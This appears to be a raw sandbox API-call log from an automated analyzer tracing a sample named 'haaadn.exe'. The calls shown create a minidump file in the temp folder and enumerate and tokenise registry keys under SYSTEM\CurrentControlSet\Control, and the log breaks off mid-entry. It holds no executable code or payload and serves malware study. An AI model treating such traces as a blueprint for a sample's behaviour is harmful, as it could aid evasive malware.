# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 25.06.2020 08:00:12.784 Process: id = "1" image_name = "haaadn.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\haaadn.exe" page_root = "0x4cf79000" os_pid = "0x688" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\haaadn.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x124 [0027.262] GetModuleHandleA (lpModuleName=0x0) returned 0x1000000 [0027.262] GetProcessHeap () returned 0x420000 [0027.262] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x4681) returned 0x434b28 [0027.269] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff5c | out: lpSystemTimeAsFileTime=0x18ff5c*(dwLowDateTime=0xb56c4500, dwHighDateTime=0x1d64ac6)) [0027.269] QueryPerformanceFrequency (in: lpFrequency=0x18ff64 | out: lpFrequency=0x18ff64*=100000000) returned 1 [0027.269] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff54 | out: lpPerformanceCount=0x18ff54*=14801406116) returned 1 [0027.269] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x90 [0027.269] GetModuleHandleA (lpModuleName=0x0) returned 0x1000000 [0027.269] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x208) returned 0x4391b8 [0027.269] GetModuleFileNameW (in: hModule=0x1000000, lpFilename=0x4391b8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\haaadn.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\haaadn.exe")) returned 0x30 [0027.269] StrRChrW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\haaadn.exe", lpEnd=0x0, wMatch=0x5c) returned="\\haaadn.exe" [0027.269] lstrlenW (lpString="haaadn.exe") returned 10 [0027.269] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x16) returned 0x4393c8 [0027.269] PathFindExtensionW (pszPath="haaadn.exe") returned=".exe" [0027.269] StrChrW (lpStart="haaadn", wMatch=0x3a) returned 0x0 [0027.269] LoadLibraryA (lpLibFileName="DBGHELP.DLL") returned 0x75590000 [0027.652] GetProcAddress (hModule=0x75590000, lpProcName="MiniDumpWriteDump") returned 0x755d5d38 [0027.652] lstrlenW (lpString="haaadn") returned 6 [0027.652] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x26 [0027.652] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x62) returned 0x4393e8 [0027.652] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x4393e8, nSize=0x26 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x26 [0027.652] lstrcatW (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpString2="haaadn" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\haaadn") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\haaadn" [0027.652] lstrcatW (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\haaadn", lpString2=".dmp" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\haaadn.dmp") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\haaadn.dmp" [0027.652] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\haaadn.dmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\haaadn.dmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0027.653] SetFilePointer (in: hFile=0x94, lDistanceToMove=65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0027.653] SetEndOfFile (hFile=0x94) returned 1 [0027.654] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x100416a) returned 0x0 [0027.654] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control", phkResult=0x18ff88 | out: phkResult=0x18ff88*=0x98) returned 0x0 [0027.654] RegEnumKeyW (in: hKey=0x98, dwIndex=0x0, lpName=0x18fd58, cchName=0x104 | out: lpName="ACPI") returned 0x0 [0027.654] lstrlenW (lpString="ACPI") returned 4 [0027.654] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x16) returned 0x439458 [0027.654] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1, lpName=0x18fd58, cchName=0x104 | out: lpName="AGP") returned 0x0 [0027.654] lstrlenW (lpString="AGP") returned 3 [0027.654] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x439478 [0027.654] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2, lpName=0x18fd58, cchName=0x104 | out: lpName="AppID") returned 0x0 [0027.654] lstrlenW (lpString="AppID") returned 5 [0027.655] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x439498 [0027.655] lstrcmpW (lpString1="agp", lpString2="app") returned -1 [0027.657] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x12) returned 0x439638 [0027.657] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3, lpName=0x18fd58, cchName=0x104 | out: lpName="Arbiters") returned 0x0 [0027.657] lstrlenW (lpString="Arbiters") returned 8 [0027.657] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1e) returned 0x4340b8 [0027.657] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4, lpName=0x18fd58, cchName=0x104 | out: lpName="BackupRestore") returned 0x0 [0027.657] lstrlenW (lpString="BackupRestore") returned 13 [0027.657] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1a) returned 0x4340e0 [0027.657] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1c) returned 0x434108 [0027.657] RegEnumKeyW (in: hKey=0x98, dwIndex=0x5, lpName=0x18fd58, cchName=0x104 | out: lpName="Class") returned 0x0 [0027.657] lstrlenW (lpString="Class") returned 5 [0027.657] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x439658 [0027.657] RegEnumKeyW (in: hKey=0x98, dwIndex=0x6, lpName=0x18fd58, cchName=0x104 | out: lpName="CMF") returned 0x0 [0027.657] lstrlenW (lpString="CMF") returned 3 [0027.657] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x439678 [0027.657] lstrcmpW (lpString1="agp", lpString2="cmf") returned -1 [0027.657] lstrcmpW (lpString1="app", lpString2="cmf") returned -1 [0027.657] RegEnumKeyW (in: hKey=0x98, dwIndex=0x7, lpName=0x18fd58, cchName=0x104 | out: lpName="CoDeviceInstallers") returned 0x0 [0027.657] lstrlenW (lpString="CoDeviceInstallers") returned 18 [0027.657] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x12) returned 0x439b38 [0027.657] lstrcmpW (lpString1="id", lpString2="co") returned 1 [0027.657] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1a) returned 0x434130 [0027.657] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0027.657] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x22) returned 0x439b58 [0027.657] RegEnumKeyW (in: hKey=0x98, dwIndex=0x8, lpName=0x18fd58, cchName=0x104 | out: lpName="COM Name Arbiter") returned 0x0 [0027.658] lstrlenW (lpString="COM Name Arbiter") returned 16 [0027.658] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x439b88 [0027.658] lstrcmpW (lpString1="agp", lpString2="com") returned -1 [0027.658] lstrcmpW (lpString1="app", lpString2="com") returned -1 [0027.658] lstrcmpW (lpString1="cmf", lpString2="com") returned -1 [0027.658] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x16) returned 0x439ba8 [0027.658] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0027.658] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1c) returned 0x434158 [0027.658] lstrcmpW (lpString1="restore", lpString2="arbiter") returned 1 [0027.658] RegEnumKeyW (in: hKey=0x98, dwIndex=0x9, lpName=0x18fd58, cchName=0x104 | out: lpName="ComputerName") returned 0x0 [0027.658] lstrlenW (lpString="ComputerName") returned 12 [0027.658] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1e) returned 0x434180 [0027.658] lstrcmpW (lpString1="arbiters", lpString2="computer") returned -1 [0027.658] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x16) returned 0x439bc8 [0027.658] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0027.658] lstrcmpW (lpString1="name", lpString2="name") returned 0 [0027.658] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x439bc8 | out: hHeap=0x420000) returned 1 [0027.658] RegEnumKeyW (in: hKey=0x98, dwIndex=0xa, lpName=0x18fd58, cchName=0x104 | out: lpName="ContentIndex") returned 0x0 [0027.658] lstrlenW (lpString="ContentIndex") returned 12 [0027.658] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1c) returned 0x4341a8 [0027.658] lstrcmpW (lpString1="restore", lpString2="content") returned 1 [0027.658] lstrcmpW (lpString1="arbiter", lpString2="content") returned -1 [0027.658] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x439bc8 [0027.658] lstrcmpW (lpString1="class", lpString2="index") returned -1 [0027.658] RegEnumKeyW (in: hKey=0x98, dwIndex=0xb, lpName=0x18fd58, cchName=0x104 | out: lpName="CrashControl") returned 0x0 [0027.658] lstrlenW (lpString="CrashControl") returned 12 [0027.658] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x439be8 [0027.658] lstrcmpW (lpString1="class", lpString2="crash") returned -1 [0027.658] lstrcmpW (lpString1="index", lpString2="crash") returned 1 [0027.659] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1c) returned 0x4341d0 [0027.659] lstrcmpW (lpString1="restore", lpString2="control") returned 1 [0027.659] lstrcmpW (lpString1="arbiter", lpString2="control") returned -1 [0027.659] lstrcmpW (lpString1="content", lpString2="control") returned -1 [0027.659] RegEnumKeyW (in: hKey=0x98, dwIndex=0xc, lpName=0x18fd58, cchName=0x104 | out: lpName="CriticalDeviceDatabase") returned 0x0 [0027.659] lstrlenW (lpString="CriticalDeviceDatabase") returned 22 [0027.659] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1e) returned 0x4341f8 [0027.659] lstrcmpW (lpString1="arbiters", lpString2="critical") returned -1 [0027.659] lstrcmpW (lpString1="computer", lpString2="critical") returned -1 [0027.659] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1a) returned 0x434220 [0027.659] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0027.659] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0027.659] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434220 | out: hHeap=0x420000) returned 1 [0027.659] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1e) returned 0x434220 [0027.659] lstrcmpW (lpString1="arbiters", lpString2="database") returned -1 [0027.659] lstrcmpW (lpString1="computer", lpString2="database") returned -1 [0027.659] lstrcmpW (lpString1="critical", lpString2="database") returned -1 [0027.659] RegEnumKeyW (in: hKey=0x98, dwIndex=0xd, lpName=0x18fd58, cchName=0x104 | out: lpName="Cryptography") returned 0x0 [0027.659] lstrlenW (lpString="Cryptography") returned 12 [0027.659] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x26) returned 0x439c08 [0027.659] RegEnumKeyW (in: hKey=0x98, dwIndex=0xe, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceClasses") returned 0x0 [0027.659] lstrlenW (lpString="DeviceClasses") returned 13 [0027.659] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1a) returned 0x434248 [0027.659] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0027.659] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0027.659] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434248 | out: hHeap=0x420000) returned 1 [0027.659] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1c) returned 0x434248 [0027.660] lstrcmpW (lpString1="restore", lpString2="classes") returned 1 [0027.660] lstrcmpW (lpString1="arbiter", lpString2="classes") returned -1 [0027.660] lstrcmpW (lpString1="content", lpString2="classes") returned 1 [0027.660] lstrcmpW (lpString1="control", lpString2="classes") returned 1 [0027.660] RegEnumKeyW (in: hKey=0x98, dwIndex=0xf, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceOverrides") returned 0x0 [0027.660] lstrlenW (lpString="DeviceOverrides") returned 15 [0027.660] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1a) returned 0x434270 [0027.660] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0027.660] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0027.660] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434270 | out: hHeap=0x420000) returned 1 [0027.660] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x20) returned 0x434270 [0027.660] RegEnumKeyW (in: hKey=0x98, dwIndex=0x10, lpName=0x18fd58, cchName=0x104 | out: lpName="Diagnostics") returned 0x0 [0027.660] lstrlenW (lpString="Diagnostics") returned 11 [0027.660] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x24) returned 0x439c38 [0027.660] RegEnumKeyW (in: hKey=0x98, dwIndex=0x11, lpName=0x18fd58, cchName=0x104 | out: lpName="Els") returned 0x0 [0027.660] lstrlenW (lpString="Els") returned 3 [0027.660] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x439c80 [0027.661] lstrcmpW (lpString1="agp", lpString2="els") returned -1 [0027.661] lstrcmpW (lpString1="app", lpString2="els") returned -1 [0027.661] lstrcmpW (lpString1="cmf", lpString2="els") returned -1 [0027.661] lstrcmpW (lpString1="com", lpString2="els") returned -1 [0027.661] RegEnumKeyW (in: hKey=0x98, dwIndex=0x12, lpName=0x18fd58, cchName=0x104 | out: lpName="Errata") returned 0x0 [0027.661] lstrlenW (lpString="Errata") returned 6 [0027.661] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1a) returned 0x434298 [0027.661] lstrcmpW (lpString1="backup", lpString2="errata") returned -1 [0027.661] lstrcmpW (lpString1="device", lpString2="errata") returned -1 [0027.661] RegEnumKeyW (in: hKey=0x98, dwIndex=0x13, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystem") returned 0x0 [0027.661] lstrlenW (lpString="FileSystem") returned 10 [0027.661] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x16) returned 0x439ca0 [0027.661] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0027.661] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0027.661] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1a) returned 0x4342c0 [0027.661] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0027.661] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0027.661] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0027.661] RegEnumKeyW (in: hKey=0x98, dwIndex=0x14, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystemUtilities") returned 0x0 [0027.661] lstrlenW (lpString="FileSystemUtilities") returned 19 [0027.661] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x16) returned 0x439cc0 [0027.661] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0027.661] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0027.661] lstrcmpW (lpString1="file", lpString2="file") returned 0 [0027.661] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x439cc0 | out: hHeap=0x420000) returned 1 [0027.662] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1a) returned 0x4342e8 [0027.662] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0027.662] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0027.662] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0027.662] lstrcmpW (lpString1="system", lpString2="system") returned 0 [0027.662] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4342e8 | out: hHeap=0x420000) returned 1 [0027.662] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x20) returned 0x4342e8 [0027.662] lstrcmpW (lpString1="overrides", lpString2="utilities") returned -1 [0027.662] RegEnumKeyW (in: hKey=0x98, dwIndex=0x15, lpName=0x18fd58, cchName=0x104 | out: lpName="GraphicsDrivers") returned 0x0 [0027.662] lstrlenW (lpString="GraphicsDrivers") returned 15 [0027.662] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1e) returned 0x434310 [0027.662] lstrcmpW (lpString1="arbiters", lpString2="graphics") returned -1 [0027.662] lstrcmpW (lpString1="computer", lpString2="graphics") returned -1 [0027.662] lstrcmpW (lpString1="critical", lpString2="graphics") returned -1 [0027.662] lstrcmpW (lpString1="database", lpString2="graphics") returned -1 [0027.662] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1c) returned 0x434338 [0027.662] lstrcmpW (lpString1="restore", lpString2="drivers") returned 1 [0027.662] lstrcmpW (lpString1="arbiter", lpString2="drivers") returned -1 [0027.662] lstrcmpW (lpString1="content", lpString2="drivers") returned -1 [0027.662] lstrcmpW (lpString1="control", lpString2="drivers") returned -1 [0027.662] lstrcmpW (lpString1="classes", lpString2="drivers") returned -1 [0027.662] RegEnumKeyW (in: hKey=0x98, dwIndex=0x16, lpName=0x18fd58, cchName=0x104 | out: lpName="GroupOrderList") returned 0x0 [0027.662] lstrlenW (lpString="GroupOrderList") returned 14 [0027.662] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x439cc0 [0027.662] lstrcmpW (lpString1="class", lpString2="group") returned -1 [0027.662] lstrcmpW (lpString1="index", lpString2="group") returned 1 [0027.662] lstrcmpW (lpString1="crash", lpString2="group") returned -1 [0027.662] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x439ce0 [0027.663] lstrcmpW (lpString1="class", lpString2="order") returned -1 [0027.663] lstrcmpW (lpString1="index", lpString2="order") returned -1 [0027.663] lstrcmpW (lpString1="crash", lpString2="order") returned -1 [0027.663] lstrcmpW (lpString1="group", lpString2="order") returned -1 [0027.663] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x16) returned 0x439d00 [0027.663] lstrcmpW (lpString1="acpi", lpString2="list") returned -1 [0027.663] lstrcmpW (lpString1="name", lpString2="list") returned 1 [0027.663] lstrcmpW (lpString1="file", lpString2="list") returned -1 [0027.663] RegEnumKeyW (in: hKey=0x98, dwIndex=0x17, lpName=0x18fd58, cchName=0x104 | out: lpName="HAL") returned 0x0 [0027.663] lstrlenW (lpString="HAL") returned 3 [0027.674] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x439d20 [0027.674] lstrcmpW (lpString1="agp", lpString2="hal") returned -1 [0027.674] lstrcmpW (lpString1="app", lpString2="hal") returned -1 [0027.674] lstrcmpW (lpString1="cmf", lpString2="hal") returned -1 [0027.675] lstrcmpW (lpString1="com", lpString2="hal") returned -1 [0027.675] lstrcmpW (lpString1="els", lpString2="hal") returned -1 [0027.675] RegEnumKeyW (in: hKey=0x98, dwIndex=0x18, lpName=0x18fd58, cchName=0x104 | out: lpName="IDConfigDB") returned 0x0 [0027.675] lstrlenW (lpString="IDConfigDB") returned 10 [0027.675] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1e) returned 0x434360 [0027.675] lstrcmpW (lpString1="arbiters", lpString2="idconfig") returned -1 [0027.675] lstrcmpW (lpString1="computer", lpString2="idconfig") returned -1 [0027.675] lstrcmpW (lpString1="critical", lpString2="idconfig") returned -1 [0027.675] lstrcmpW (lpString1="database", lpString2="idconfig") returned -1 [0027.675] lstrcmpW (lpString1="graphics", lpString2="idconfig") returned -1 [0027.675] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x12) returned 0x439d40 [0027.675] lstrcmpW (lpString1="id", lpString2="db") returned 1 [0027.675] lstrcmpW (lpString1="co", lpString2="db") returned -1 [0027.675] RegEnumKeyW (in: hKey=0x98, dwIndex=0x19, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layout") returned 0x0 [0027.675] lstrlenW (lpString="Keyboard Layout") returned 15 [0027.675] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1e) returned 0x434388 [0027.675] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0027.675] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0027.675] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0027.675] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0027.675] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0027.675] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0027.675] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1a) returned 0x4343b0 [0027.675] lstrcmpW (lpString1="backup", lpString2="layout") returned -1 [0027.675] lstrcmpW (lpString1="device", lpString2="layout") returned -1 [0027.675] lstrcmpW (lpString1="errata", lpString2="layout") returned -1 [0027.675] lstrcmpW (lpString1="system", lpString2="layout") returned 1 [0027.675] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1a, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layouts") returned 0x0 [0027.675] lstrlenW (lpString="Keyboard Layouts") returned 16 [0027.675] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1e) returned 0x4343d8 [0027.676] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0027.676] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0027.676] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0027.676] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0027.676] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0027.676] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0027.676] lstrcmpW (lpString1="keyboard", lpString2="keyboard") returned 0 [0027.676] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4343d8 | out: hHeap=0x420000) returned 1 [0027.676] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1c) returned 0x4343d8 [0027.676] lstrcmpW (lpString1="restore", lpString2="layouts") returned 1 [0027.676] lstrcmpW (lpString1="arbiter", lpString2="layouts") returned -1 [0027.676] lstrcmpW (lpString1="content", lpString2="layouts") returned -1 [0027.676] lstrcmpW (lpString1="control", lpString2="layouts") returned -1 [0027.676] lstrcmpW (lpString1="classes", lpString2="layouts") returned -1 [0027.676] lstrcmpW (lpString1="drivers", lpString2="layouts") returned -1 [0027.676] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1b, lpName=0x18fd58, cchName=0x104 | out: lpName="Lsa") returned 0x0 [0027.676] lstrlenW (lpString="Lsa") returned 3 [0027.676] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x439d60 [0027.676] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0027.676] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0027.676] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0027.676] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0027.676] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0027.676] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0027.676] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1c, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaExtensionConfig") returned 0x0 [0027.676] lstrlenW (lpString="LsaExtensionConfig") returned 18 [0027.676] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x439d80 [0027.676] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0027.676] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0027.676] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0027.676] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0027.676] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0027.676] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0027.677] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0027.677] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x439d80 | out: hHeap=0x420000) returned 1 [0027.677] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x20) returned 0x434400 [0027.677] lstrcmpW (lpString1="overrides", lpString2="extension") returned 1 [0027.677] lstrcmpW (lpString1="utilities", lpString2="extension") returned 1 [0027.677] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x1a) returned 0x434428 [0027.677] lstrcmpW (lpString1="backup", lpString2="config") returned -1 [0027.677] lstrcmpW (lpString1="device", lpString2="config") returned 1 [0027.677] lstrcmpW (lpString1="errata", lpString2="config") returned 1 [0027.677] lstrcmpW (lpString1="system", lpString2="config") returned 1 [0027.677] lstrcmpW (lpString1="layout", lpString2="config") returned 1 [0027.677] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1d, lpName=0x18fd58, cchName=0x104 | out: lpName="LsaInformation") returned 0x0 [0027.677] lstrlenW (lpString="LsaInformation") returned 14 [0027.677] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 0x439d80 [0027.677] lstrcmpW (lpString1="agp", lpString2="lsa") returned -1 [0027.677] lstrcmpW (lpString1="app", lpString2="lsa") returned -1 [0027.677] lstrcmpW (lpString1="cmf", lpString2="lsa") returned -1 [0027.677] lstrcmpW (lpString1="com", lpString2="lsa") returned -1 [0027.677] lstrcmpW (lpString1="els", lpString2="lsa") returned -1 [0027.677] lstrcmpW (lpString1="hal", lpString2="lsa") returned -1 [0027.677] lstrcmpW (lpString1="lsa", lpString2="lsa") returned 0 [0027.677] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x439d80 | out: hHeap=0x420000) returned 1 [0027.677] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x24) returned 0x43a468 [0027.677] lstrcmpW (lpString1="diagnostics", lpString2="information") returned -1 [0027.677] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1e, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaCategories") returned 0x0 [0027.677] lstrlenW (lpString="MediaCategories") returned 15 [0027.677] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x439d80 [0027.677] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0027.677] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0027.677] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0027.677] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0027.677] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0027.678] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x22) returned 0x43a498 [0027.678] lstrcmpW (lpString1="installers", lpString2="categories") returned 1 [0027.678] RegEnumKeyW (in: hKey=0x98, dwIndex=0x1f, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaDRM") returned 0x0 [0027.678] lstrlenW (lpString="MediaDRM") returned 8 [0027.678] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x18) returned 0x439da0 [0027.678] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0027.678] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0027.678] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0027.678] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0027.678] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0027.678] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0027.678] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x439da0 | out: hHeap=0x420000) returned 1 [0027.678] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x14) returned 